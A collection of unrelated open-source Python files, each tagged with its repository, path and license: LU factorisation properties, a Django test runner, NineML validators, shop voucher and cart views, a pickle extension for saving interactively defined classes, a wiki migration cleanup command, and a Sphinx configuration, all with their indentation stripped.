cols.append(csc_matrix(col))
return hstack(cols)
def _compute_lu(self):
if self._L is None:
self._L, self._U, self._P, self._Q, self._R, do_recip = self.umf.lu(self._A)
if do_recip:
with np.errstate(divide='ignore'):
np.reciprocal(self._R, out=self._R)
# Conform to scipy.sparse.splu convention on permutation matrices
self._P = self._P[self._P]
@property
def shape(self):
"""
Shape of the original matrix as a tuple of ints.
"""
return self._A.shape
@property
def L(self):
"""
Lower triangular factor with unit diagonal as a
`scipy.sparse.csc_matrix`.
"""
self._compute_lu()
return self._L
@property
def U(self):
"""
Upper triangular factor as a `scipy.sparse.csc_matrix`.
"""
self._compute_lu()
return self._U
@property
def R(self):
"""
Row scaling factors, as a 1D array.
"""
self._compute_lu()
return self._R
@property
def perm_c(self):
"""
Permutation Pc represented as an array of indices.
The column permutation matrix can be reconstructed via:
>>> Pc = np.zeros((n, n))
>>> Pc[np.arange(n), perm_c] = 1
"""
self._compute_lu()
return self._Q
@property
def perm_r(self):
"""
Permutation Pr represented as an array of indices.
The row permutation matrix can be reconstructed via:
>>> Pr = np.zeros((n, n))
>>> Pr[perm_r, np.arange(n)] = 1
"""
self._compute_lu()
return self._P
@property
def nnz(self):
"""
Combined number of nonzeros in L and U: L.nnz + U.nnz
"""
return self._L.nnz + self._U.nnz
| rc/scikit-umfpack-rc | scikits/umfpack/interface.py | Python | bsd-3-clause | 8,440 |
"""
A standalone test runner script, configuring the minimum settings
required for tests to execute.
Re-use at your own risk: many Django applications will require
different settings and/or templates to run their tests.
"""
import os
import sys
# Make sure the app is (at least temporarily) on the import path.
APP_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, APP_DIR)
# Minimum settings required for the app's tests.
SETTINGS_DICT = {
'BASE_DIR': APP_DIR,
'INSTALLED_APPS': (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'registration',
),
'ROOT_URLCONF': 'registration.backends.default.urls',
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(APP_DIR, 'db.sqlite3'),
},
},
'MIDDLEWARE_CLASSES': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
'SITE_ID': 1,
'TEMPLATE_DIRS': (
os.path.join(APP_DIR, 'tests/templates'),
),
}
def run_tests():
# Making Django run this way is a two-step process. First, call
# settings.configure() to give Django settings to work with:
from django.conf import settings
settings.configure(**SETTINGS_DICT)
# Then, call django.setup() to initialize the application cache
# and other bits:
import django
if hasattr(django, 'setup'):
django.setup()
# Now we instantiate a test runner...
from django.test.utils import get_runner
TestRunner = get_runner(settings)
# And then we run tests and return the results.
test_runner = TestRunner(verbosity=1, interactive=True)
failures = test_runner.run_tests(['registration.tests'])
sys.exit(bool(failures))
| tdruez/django-registration | registration/runtests.py | Python | bsd-3-clause | 2,003 |
"""
This file contains the DynamicsValidator class for validating component
:copyright: Copyright 2010-2017 by the NineML Python team, see AUTHORS.
:license: BSD-3, see LICENSE for details.
"""
from builtins import object
from nineml.visitors.validators import NoDuplicatedObjectsValidator
from .general import (
TimeDerivativesAreDeclaredDynamicsValidator,
StateAssignmentsAreOnStateVariablesDynamicsValidator,
AliasesAreNotRecursiveDynamicsValidator,
NoUnresolvedSymbolsDynamicsValidator,
RegimeGraphDynamicsValidator,
RegimeOnlyHasOneHandlerPerEventDynamicsValidator,
CheckNoLHSAssignmentsToMathsNamespaceDynamicsValidator,
DimensionalityDynamicsValidator)
from .names import (
LocalNameConflictsDynamicsValidator,
DimensionNameConflictsDynamicsValidator,
DuplicateRegimeNamesDynamicsValidator,
RegimeAliasMatchesBaseScopeValidator)
from .ports import (
EventPortsDynamicsValidator, OutputAnalogPortsDynamicsValidator)
from .types import (
TypesDynamicsValidator)
class DynamicsValidator(object):
"""Class for grouping all the component-validations tests together"""
@classmethod
def validate_componentclass(cls, component_class,
validate_dimensions=True, **kwargs):
"""
Tests a componentclassclass against a variety of tests, to verify its
internal structure
"""
# Check class structure:
TypesDynamicsValidator(component_class, **kwargs)
NoDuplicatedObjectsValidator(component_class, **kwargs)
DuplicateRegimeNamesDynamicsValidator(component_class, **kwargs)
LocalNameConflictsDynamicsValidator(component_class, **kwargs)
DimensionNameConflictsDynamicsValidator(component_class, **kwargs)
RegimeAliasMatchesBaseScopeValidator(component_class, **kwargs)
EventPortsDynamicsValidator(component_class, **kwargs)
OutputAnalogPortsDynamicsValidator(component_class, **kwargs)
TimeDerivativesAreDeclaredDynamicsValidator(component_class, **kwargs)
StateAssignmentsAreOnStateVariablesDynamicsValidator(component_class,
**kwargs)
AliasesAreNotRecursiveDynamicsValidator(component_class, **kwargs)
NoUnresolvedSymbolsDynamicsValidator(component_class, **kwargs)
RegimeGraphDynamicsValidator(component_class, **kwargs)
RegimeOnlyHasOneHandlerPerEventDynamicsValidator(component_class,
**kwargs)
CheckNoLHSAssignmentsToMathsNamespaceDynamicsValidator(component_class,
**kwargs)
if validate_dimensions:
DimensionalityDynamicsValidator(component_class, **kwargs)
| INCF/lib9ML | nineml/abstraction/dynamics/visitors/validators/base.py | Python | bsd-3-clause | 2,819 |
import json
# django imports
from django.contrib.auth.decorators import permission_required
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.http import require_POST
# lfs imports
import lfs.voucher.utils
from lfs.core.utils import LazyEncoder
from lfs.core.utils import render_to_ajax_response
from lfs.tax.models import Tax
from lfs.voucher.models import Voucher
from lfs.voucher.models import VoucherGroup
from lfs.voucher.models import VoucherOptions
from lfs.manage.voucher.forms import VoucherForm
from lfs.manage.voucher.forms import VoucherGroupAddForm
from lfs.manage.voucher.forms import VoucherGroupForm
from lfs.manage.voucher.forms import VoucherOptionsForm
# Views
@permission_required("core.manage_shop")
def no_vouchers(request, template_name="manage/voucher/no_vouchers.html"):
"""Displays that no vouchers exist.
"""
if len(VoucherGroup.objects.all()) == 0:
return render_to_response(template_name, RequestContext(request, {}))
else:
return manage_vouchers(request)
@permission_required("core.manage_shop")
def voucher_group(request, id, template_name="manage/voucher/voucher_group.html"):
"""Main view to display a voucher group.
"""
try:
voucher_group = VoucherGroup.objects.get(pk=id)
except VoucherGroup.DoesNotExist:
return manage_vouchers(request)
return render_to_response(template_name, RequestContext(request, {
"voucher_group": voucher_group,
"data_tab": data_tab(request, voucher_group),
"vouchers_tab": vouchers_tab(request, voucher_group),
"options_tab": options_tab(request),
"navigation": navigation(request, voucher_group),
}))
# Parts
def navigation(request, voucher_group, template_name="manage/voucher/navigation.html"):
"""Displays the navigation.
"""
return render_to_string(template_name, RequestContext(request, {
"voucher_group": voucher_group,
"voucher_groups": VoucherGroup.objects.all(),
}))
def data_tab(request, voucher_group, template_name="manage/voucher/data.html"):
"""Displays the data tab of the passed voucher group.
"""
if request.method == "POST":
form = VoucherGroupForm(instance=voucher_group, data=request.POST)
if form.is_valid():
form = VoucherGroupForm(instance=voucher_group)
else:
form = VoucherGroupForm(instance=voucher_group)
return render_to_string(template_name, RequestContext(request, {
"voucher_group": voucher_group,
"form": form,
}))
def vouchers_tab(request, voucher_group, deleted=False, template_name="manage/voucher/vouchers.html"):
"""Displays the vouchers tab
"""
vouchers = voucher_group.vouchers.all()
paginator = Paginator(vouchers, 20)
page = paginator.page((request.POST if request.method == 'POST' else request.GET).get("page", 1))
taxes = Tax.objects.all()
if request.method == "POST" and deleted == False:
voucher_form = VoucherForm(data=request.POST)
else:
voucher_form = VoucherForm()
return render_to_string(template_name, RequestContext(request, {
"voucher_group": voucher_group,
"taxes": taxes,
"form": voucher_form,
"vouchers_inline": vouchers_inline(request, voucher_group, vouchers, paginator, page),
}))
def options_tab(request, template_name="manage/voucher/options.html"):
"""Displays the vouchers options
"""
try:
voucher_options = VoucherOptions.objects.all()[0]
except IndexError:
voucher_options = VoucherOptions.objects.create()
form = VoucherOptionsForm(instance=voucher_options)
return render_to_string(template_name, RequestContext(request, {
"form": form,
}))
def vouchers_inline(request, voucher_group, vouchers, paginator, page, template_name="manage/voucher/vouchers_inline.html"):
"""Displays the pages of the vouchers
"""
return render_to_string(template_name, RequestContext(request, {
"paginator": paginator,
"page": page,
"vouchers": vouchers,
"voucher_group": voucher_group,
}))
# Actions
@permission_required("core.manage_shop")
def set_vouchers_page(request):
"""Sets the displayed voucher page.
"""
req = request.POST if request.method == 'POST' else request.GET
group_id = req.get("group")
voucher_group = VoucherGroup.objects.get(pk=group_id)
vouchers = voucher_group.vouchers.all()
paginator = Paginator(vouchers, 20)
page = paginator.page(req.get("page", 1))
html = (
("#vouchers-inline", vouchers_inline(request, voucher_group, vouchers, paginator, page)),
)
return HttpResponse(
json.dumps({"html": html}, cls=LazyEncoder),
content_type='application/json')
@permission_required("core.manage_shop")
def manage_vouchers(request):
"""Redirects to the first voucher group or to no voucher groups view.
"""
try:
voucher_group = VoucherGroup.objects.all()[0]
except IndexError:
url = reverse("lfs_no_vouchers")
else:
url = reverse("lfs_manage_voucher_group", kwargs={"id": voucher_group.id})
return HttpResponseRedirect(url)
@permission_required("core.manage_shop")
def add_vouchers(request, group_id):
"""
"""
voucher_group = VoucherGroup.objects.get(pk=group_id)
form = VoucherForm(data=request.POST)
msg = ""
if form.is_valid():
try:
amount = int(request.POST.get("amount", 0))
except TypeError:
amount = 0
for i in range(0, amount):
number = lfs.voucher.utils.create_voucher_number()
counter = 0
while Voucher.objects.filter(number=number).exists() and counter < 100:
number = lfs.voucher.utils.create_voucher_number()
counter += 1
if counter == 100:
msg = _(u"Unable to create unique Vouchers for the options specified.")
break
Voucher.objects.create(
number=number,
group=voucher_group,
creator=request.user,
kind_of=request.POST.get("kind_of", 0),
value=request.POST.get("value", 0.0),
start_date=request.POST.get("start_date"),
end_date=request.POST.get("end_date"),
effective_from=request.POST.get("effective_from"),
tax_id=request.POST.get("tax"),
limit=request.POST.get("limit")
)
msg = _(u"Vouchers have been created.")
return render_to_ajax_response(
(("#vouchers", vouchers_tab(request, voucher_group)), ),
msg)
@permission_required("core.manage_shop")
@require_POST
def delete_vouchers(request, group_id):
"""Deletes checked vouchers.
"""
voucher_group = VoucherGroup.objects.get(pk=group_id)
vouchers = Voucher.objects.filter(pk__in=request.POST.getlist("voucher-ids"))
for voucher in vouchers:
voucher.delete()
return render_to_ajax_response(
(("#vouchers", vouchers_tab(request, voucher_group, deleted=True)), ),
_(u"Vouchers have been deleted."))
@permission_required("core.manage_shop")
def add_voucher_group(request, template_name="manage/voucher/add_voucher_group.html"):
"""Adds a voucher group
"""
if request.method == "POST":
form = VoucherGroupAddForm(data=request.POST)
if form.is_valid():
voucher_group = form.save(commit=False)
voucher_group.creator = request.user
voucher_group.save()
url = reverse("lfs_manage_voucher_group", kwargs={"id": voucher_group.id})
return HttpResponseRedirect(url)
else:
form = VoucherGroupAddForm()
return render_to_response(template_name, RequestContext(request, {
"form": form,
"voucher_groups": VoucherGroup.objects.all(),
"came_from": (request.POST if request.method == 'POST' else request.GET).get("came_from",
reverse("lfs_manage_vouchers")),
}))
@permission_required("core.manage_shop")
def save_voucher_group_data(request, id):
"""Saves the data of the voucher group with passed id.
"""
voucher_group = VoucherGroup.objects.get(pk=id)
form = VoucherGroupForm(instance=voucher_group, data=request.POST)
if form.is_valid():
voucher_group = form.save()
_update_positions()
voucher_group = VoucherGroup.objects.get(pk=voucher_group.id)
return render_to_ajax_response(
(("#data_tab", data_tab(request, voucher_group)),
("#navigation", navigation(request, voucher_group)),),
_(u"Voucher data has been saved."))
@permission_required("core.manage_shop")
@require_POST
def delete_voucher_group(request, id):
"""Deletes voucher group with given id and all assigned vouchers.
"""
try:
voucher_group = VoucherGroup.objects.get(pk=id)
except VoucherGroup.DoesNotExist:
return HttpResponseRedirect(reverse("lfs_manage_vouchers"))
else:
voucher_group.delete()
return lfs.core.utils.set_message_cookie(
url=reverse("lfs_manage_vouchers"),
msg=_(u"Voucher group and assigned vouchers have been deleted."),
)
@permission_required("core.manage_shop")
def save_voucher_options(request):
"""Saves voucher options.
"""
try:
voucher_options = VoucherOptions.objects.all()[0]
except IndexError:
voucher_options = VoucherOptions.objects.create()
form = VoucherOptionsForm(instance=voucher_options, data=request.POST)
if form.is_valid():
form.save()
return render_to_ajax_response(
(("#options_tab", options_tab(request)),),
_(u"Voucher options has been saved.")
)
def _update_positions():
for i, voucher_group in enumerate(VoucherGroup.objects.all()):
voucher_group.position = (i + 1) * 10
voucher_group.save()
| baffolobill/django-lfs | lfs/manage/voucher/views.py | Python | bsd-3-clause | 10,411 |
from django import forms
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.db.models import ObjectDoesNotExist
from django.shortcuts import get_object_or_404, redirect, render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.views import generic
from plata.contact.models import Contact
from plata.discount.models import Discount
from plata.shop.views import Shop
from plata.shop.models import Order
from simple.models import Product
shop = Shop(Contact, Order, Discount)
product_list = generic.ListView.as_view(
queryset=Product.objects.filter(is_active=True),
template_name='product/product_list.html',
)
class OrderItemForm(forms.Form):
quantity = forms.IntegerField(label=_('quantity'), initial=1,
min_value=1, max_value=100)
def product_detail(request, object_id):
product = get_object_or_404(Product.objects.filter(is_active=True), pk=object_id)
if request.method == 'POST':
form = OrderItemForm(request.POST)
if form.is_valid():
order = shop.order_from_request(request, create=True)
try:
order.modify_item(product, form.cleaned_data.get('quantity'))
messages.success(request, _('The cart has been updated.'))
except ValidationError, e:
if e.code == 'order_sealed':
[messages.error(request, msg) for msg in e.messages]
else:
raise
return redirect('plata_shop_cart')
else:
form = OrderItemForm()
return render_to_response('product/product_detail.html', {
'object': product,
'form': form,
}, context_instance=RequestContext(request))
| ixc/plata | examples/simple/views.py | Python | bsd-3-clause | 1,810 |
"""
Extensions to pickle allowing items in __main__ to be saved.
"""
# CEBALERT: move into snapshots.py?
import new
import pickle
import types
import __main__
from StringIO import StringIO
import copy
def _name_is_main(obj):
# CEBALERT: see IPython hack in commandline.py
return obj.__module__ == "__main__" or obj.__module__ == "__mynamespace__"
class PickleMain(object):
"""
Pickle support for types and functions defined in __main__.
When pickled, saves types and functions defined in __main__ by
value (i.e. as bytecode). When unpickled, loads previously saved
types and functions back into __main__.
"""
def _create_pickler(self):
# Usually we use the cPickle module rather than the pickle
# module (because cPickle is faster), but here we need control
# over the pickling process so we use pickle.
#
# Additionally, we create a Pickler instance to avoid changing
# defaults in the pickle module itself, so that there are no side
# effects for code elsewhere (although we don't use pickle
# anywhere else ourselves...).
self.pickled_bytecode = StringIO()
self.pickler = pickle.Pickler(self.pickled_bytecode,-1)
# CB: pickle.Pickler's dispatch attribute is a class
# attribute (I don't know why, but it is...), so before
# modifying this instance's dispatch attribute we make sure
# modifications will affect only this instance.
self.pickler.dispatch = copy.copy(self.pickler.dispatch)
self.pickler.dispatch[new.code] = save_code
self.pickler.dispatch[new.function] = save_function
self.pickler.dispatch[dict] = save_module_dict
self.pickler.dispatch[new.classobj] = save_classobj
self.pickler.dispatch[new.instancemethod] = save_instancemethod
self.pickler.dispatch[new.module] = save_module
self.pickler.dispatch[type] = save_type
# CB: maybe this should be registered from elsewhere
import param
self.pickler.dispatch[param.parameterized.ParameterizedMetaclass] = save_type
def __getstate__(self):
self._create_pickler()
bytecode = {}
for name,obj in __main__.__dict__.items():
if not name.startswith('_'):
if isinstance(obj,types.FunctionType) or isinstance(obj,type):
# (could be extended to other types, I guess
if _name_is_main(obj):
#CB: how do I print out info via Parameterized?
print "%s is defined in __main__: saving bytecode."%name
bytecode[name] = obj
self.pickler.dump(bytecode)
return {'pickled_bytecode':self.pickled_bytecode}
def __setstate__(self,state):
bytecode = pickle.load(StringIO(state['pickled_bytecode'].getvalue()))
for name,obj in bytecode.items():
print "%s restored from bytecode into __main__"%name
__main__.__dict__[name] = obj
### Copied from http://code.activestate.com/recipes/572213/ ###
# Original docstring
#
# Extend pickle module to allow pickling of interpreter state
# including any interactively defined functions and classes.
#
# This module is not required for unpickling such pickle files.
#
# >>> import savestate, pickle, __main__
# >>> pickle.dump(__main__, open('savestate.pickle', 'wb'), 2)
# (note that we're not actually using it to pickle __main__, and I've
# removed the lines that change pickle's defaults)
def save_code(self, obj):
""" Save a code object by value """
args = (
obj.co_argcount, obj.co_nlocals, obj.co_stacksize, obj.co_flags, obj.co_code,
obj.co_consts, obj.co_names, obj.co_varnames, obj.co_filename, obj.co_name,
obj.co_firstlineno, obj.co_lnotab, obj.co_freevars, obj.co_cellvars
)
self.save_reduce(new.code, args, obj=obj)
def save_function(self, obj):
""" Save functions by value if they are defined interactively """
if _name_is_main(obj) or obj.func_name == '<lambda>':
args = (obj.func_code, obj.func_globals, obj.func_name, obj.func_defaults, obj.func_closure)
self.save_reduce(new.function, args, obj=obj)
else:
self.save_global(obj)
#pickle.Pickler.save_global(self, obj)
def save_global_byname(self, obj, modname, objname):
""" Save obj as a global reference. Used for objects that pickle does not find correctly. """
self.write('%s%s\n%s\n' % (pickle.GLOBAL, modname, objname))
self.memoize(obj)
def save_module_dict(self, obj, main_dict=vars(__import__('__main__'))):
""" Special-case __main__.__dict__. Useful for a function's func_globals member. """
if obj is main_dict:
save_global_byname(self, obj, '__main__', '__dict__')
else:
return self.save_dict(obj)
#return pickle.Pickler.save_dict(self, obj) # fallback to original
def save_classobj(self, obj):
""" Save an interactively defined classic class object by value """
if _name_is_main(obj):
args = (obj.__name__, obj.__bases__, obj.__dict__)
self.save_reduce(new.classobj, args, obj=obj)
else:
name = str(obj).split('.')[-1] # CEB: hack to find classic class name
self.save_global(obj,name)
#pickle.Pickler.save_global(self, obj, name)
def save_instancemethod(self, obj):
""" Save an instancemethod object """
# Instancemethods are re-created each time they are accessed so this will not be memoized
args = (obj.im_func, obj.im_self, obj.im_class)
self.save_reduce(new.instancemethod, args)
def save_module(self, obj):
""" Save modules by reference, except __main__ which also gets its contents saved by value """
if _name_is_main(obj):
self.save_reduce(__import__, (obj.__name__,), obj=obj, state=vars(obj).copy())
elif obj.__name__.count('.') == 0:
self.save_reduce(__import__, (obj.__name__,), obj=obj)
else:
save_global_byname(self, obj, *obj.__name__.rsplit('.', 1))
def save_type(self, obj):
if getattr(new, obj.__name__, None) is obj:
# Types in 'new' module claim their module is '__builtin__' but are not actually there
save_global_byname(self, obj, 'new', obj.__name__)
elif _name_is_main(obj):
# Types in __main__ are saved by value
# Make sure we have a reference to type.__new__
if id(type.__new__) not in self.memo:
self.save_reduce(getattr, (type, '__new__'), obj=type.__new__)
self.write(pickle.POP)
# Copy dictproxy to real dict
d = dict(obj.__dict__)
# Clean up unpickleable descriptors added by Python
d.pop('__dict__', None)
d.pop('__weakref__', None)
args = (type(obj), obj.__name__, obj.__bases__, d)
self.save_reduce(type.__new__, args, obj=obj)
else:
# Fallback to default behavior: save by reference
self.save_global(obj)
#pickle.Pickler.save_global(self, obj)
###############################################################
| Tasignotas/topographica_mirror | topo/misc/picklemain.py | Python | bsd-3-clause | 7,106 |
import re
from waliki.signals import page_saved
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from waliki.models import Page
from django.utils.translation import ugettext_lazy as _
from django.utils.text import get_text_list
try:
from waliki.attachments.models import Attachment
except ImportError:
Attachment = None
try:
from sh import pandoc, echo
pandoc = pandoc.bake(_tty_out=False)
echo = echo.bake(_tty_out=False)
except ImportError:
pandoc = None
def clean_meta(rst_content):
"""remove moinmoin metada from the top of the file"""
rst = rst_content.split('\n')
for i, line in enumerate(rst):
if line.startswith('#'):
continue
break
return '\n'.join(rst[i:])
def delete_relative_links(rst_content):
"""remove links relatives. Waliki point them correctly implicitly"""
return re.sub(r'^(\.\. .*: \.\./.*)\n$', '', rst_content, flags=re.MULTILINE)
def attachments(rst_content, slug):
def rep(matchobj):
for filename in matchobj.groups(1):
try:
a = Attachment.objects.filter(file__endswith=filename, page__slug=slug)[0]
except IndexError:
print('Cant find %s in %s' % (filename, slug))
return None
return '`%s <%s>`_' % (filename, a.get_absolute_url())
return re.sub(r'`attachment:(.*)`_', rep, rst_content, flags=re.MULTILINE)
def directives(rst_content):
for directive in re.findall(r':(\w+):`.*`', rst_content, flags=re.MULTILINE):
rst_content += """
.. role:: {directive}
:class: {directive}
""".format(directive=directive)
return rst_content
def emojis(rst_content):
# require
emojis_map = {
':)': 'smile',
':-)': 'smile',
';)': 'wink',
';-)': 'wink',
':-?': 'smirk',
':?': 'smirk',
':(': 'confused',
':-(': 'confused',
':D': 'laughing',
':-D': 'laughing',
':-P': 'stuck_out_tongue_closed_eyes',
':P': 'stuck_out_tongue_closed_eyes',
":'(": 'cry',
":'-(": 'cry',
}
def replace_emoji(match):
replacement = emojis_map.get(match.groups()[0], '')
if replacement:
return '|%s|' % replacement
return ''
result = re.sub(r'\|((?:\:|;).{1,3})\|', replace_emoji, rst_content, flags=re.MULTILINE)
return result
def email(rst_content):
pattern = r'`\[\[MailTo\((.*)\)\]\]`_(?:\.\.)?'
return re.sub(pattern, r'``\1``', rst_content)
def title_level(rst_content):
def dashrepl(matchobj):
return '-' * len(matchobj.group(0))
pattern = r'^~+$'
return re.sub(pattern, dashrepl, rst_content, flags=re.MULTILINE)
def code(rst_content):
if not pandoc:
return rst_content
pattern = r'^\:\:\n\s+\.\. raw:: html\n\s+(<span class\=\"line\"\>.*?|\s+?<\/span\>)\n\s*$'
def convert(match):
source = match.groups()[0]
source = '\n'.join(l.strip() for l in source.split('\n'))
source = "<pre>%s</pre>" % source
rst_source = pandoc(echo(source), f='html', t='rst').stdout.decode('utf8')
# rst_source = rst_source.strip().replace('\n', '\n ') + '\n'
return rst_source
result = re.sub(pattern, convert, rst_content, flags=re.DOTALL | re.MULTILINE)
return result
class Command(BaseCommand):
help = 'Cleanup filters for a moin2git import'
option_list = (
make_option('--limit-to',
dest='slug',
default='',
help="optional namespace"),
make_option('--filters',
dest='filters',
default='all',
help="comma separated list of filter functions to apply"),
make_option('--message',
dest='message',
default=_("RestructuredText clean up"),
help="log message"),
) + BaseCommand.option_list
def handle(self, *args, **options):
valid_filters = ['meta', 'links',
'attachments', 'directives',
'emojis', 'title', 'email', 'code', 'title_level']
slug = options['slug']
filters = options['filters']
if filters == 'all':
filters = valid_filters
else:
filters = [f.strip() for f in filters.split(',')]
if not set(filters).issubset(valid_filters):
valid = get_text_list(valid_filters, 'and')
raise CommandError("At least one filter is unknown. Valid filters are:\n %s" % valid)
if slug:
pages = Page.objects.filter(slug__startswith=slug)
else:
pages = Page.objects.all()
for page in pages:
title = None
print('\nApplying filter/s %s to %s' % (get_text_list(filters, 'and'), page.slug))
raw = page.raw
if 'meta' in filters:
raw = clean_meta(raw)
if 'links' in filters:
raw = delete_relative_links(raw)
if 'attachments' in filters:
raw = attachments(raw, page.slug)
if 'directives' in filters:
raw = directives(raw)
if 'emojis' in filters:
raw = emojis(raw)
if 'email' in filters:
raw = email(raw)
if 'title_level' in filters:
raw = title_level(raw)
if 'code' in filters:
if not pandoc:
print('The filter "code" need Pandoc installed in your system. Ignoring')
else:
raw = code(raw)
if 'title' in filters and not page.title:
title = page._get_part('get_document_title')
if raw != page.raw or title:
if title:
page.title = title
if raw != page.raw:
page.raw = raw
page.save()
page_saved.send_robust(sender='moin',
page=page,
author=None,
message=options['message'],
form_extra_data={})
else:
print('Nothing changed. Ignoring update')
| RobertoMaurizzi/waliki | waliki/management/commands/moin_migration_cleanup.py | Python | bsd-3-clause | 6,418 |
# -*- coding: utf-8 -*-
#
# Pontoon documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 4 21:51:51 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.graphviz',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Pontoon'
copyright = u'2015, Matjaž Horvat, Mozilla Foundation'
author = u'Matjaž Horvat, Mozilla Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'venv']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Pontoondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Pontoon.tex', u'Pontoon Documentation',
u'Matjaž Horvat, Mozilla Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pontoon', u'Pontoon Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
